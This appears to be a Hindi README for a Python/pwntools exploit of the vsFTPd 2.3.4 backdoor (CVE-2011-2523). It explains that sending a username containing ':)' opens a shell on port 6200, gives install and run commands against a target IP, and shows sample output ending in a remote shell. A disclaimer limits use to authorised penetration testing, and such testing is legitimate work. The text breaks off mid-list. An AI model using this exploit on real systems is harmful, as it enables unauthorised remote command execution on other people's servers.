
vsFTPd 2.3.4 के backdoor (CVE-2011-2523) के लिए Python exploit जो गढ़े गए उपयोगकर्ता नाम के माध्यम से पोर्ट 6200 पर एक छिपे हुए शेल को ट्रिगर करता है, जो अधिकृत पेनिट्रेशन टेस्टिंग के लिए दूरस्थ कमांड निष्पादन को सक्षम बनाता है।
यह प्रोजेक्ट Python और pwntools का उपयोग करके vsFTPd 2.3.4 बैकडोर कमजोरी (CVE-2011-2523) के शोषण को प्रदर्शित करता है।
अस्वीकरण: यह प्रोजेक्ट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। बिना अनुमति के सिस्टम के विरुद्ध इसका उपयोग न करें।
👉 vsFTPd का कमजोर संस्करण एक दुर्भावनापूर्ण बैकडोर रखता है जो लॉगिन के दौरान :) वाले उपयोगकर्ता नाम का उपयोग करने पर ट्रिगर होता है।
vsFTPd 2.3.4 है या नहींUSER hello:)) भेजता हैpwntools लाइब्रेरीनिर्भरताएँ स्थापित करें:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
लक्ष्य पर vsFTPd 2.3.4 (कमजोर संस्करण) चल रहा होना चाहिए
पोर्ट 6200 पहुंच योग्य होना चाहिए
इस प्रकार के प्रयोगशाला वातावरण में सबसे अच्छा काम करता है: